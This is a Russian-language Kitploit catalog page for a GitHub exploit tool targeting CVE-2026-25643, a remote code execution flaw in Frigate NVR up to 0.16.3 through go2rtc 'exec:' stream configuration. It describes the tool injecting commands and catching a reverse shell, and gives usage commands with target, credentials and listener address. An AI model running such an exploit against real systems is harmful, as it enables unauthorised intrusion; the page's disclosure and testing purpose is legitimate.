Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-25643-Frigate-RCE | Kitploit
Инструменты/GitHubGitHub/jduardo2704/cve-2026-25643-frigate-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubjduardo2704/cve-2026-25643-frigate-rce

CVE-2026-25643-Frigate-RCE

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
36 месяцев назадЕщё не проверено

CVE-2026-25643: Frigate NVR <= 0.16.3 аутентифицированное удалённое выполнение кода (RCE)

Название эксплойта: Frigate NVR <= 0.16.3 - аутентифицированное удалённое выполнение кода
Дата: 2026-02-05
Автор эксплойта: jduardo2704
Домашняя страница вендора: https://frigate.video/
Ссылка на ПО: https://github.com/blakeblackshear/frigate
Версия: <= 0.16.3
CVE: CVE-2026-25643 Консультация: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

Описание

Версии Frigate до 0.16.3 уязвимы для удалённого выполнения кода (RCE) через конфигурацию go2rtc. Атакующий с аутентифицированным доступом (или без аутентификации, если экземпляр доступен извне) может внедрять системные команды в конфигурацию потока с помощью протокола exec:. Этот эксплойт автоматизирует внедрение полезной нагрузки, перезапускает сервис и перехватывает обратную оболочку.

Установка

root@kitploit:~
pip install requests pyyaml

Использование

Аутентифицированный режим:

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444

Режим без аутентификации (если экземпляр доступен извне):

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444

Отказ от ответственности

Этот скрипт предназначен только для образовательных целей и авторизованного тестирования безопасности.

Скачать инструмент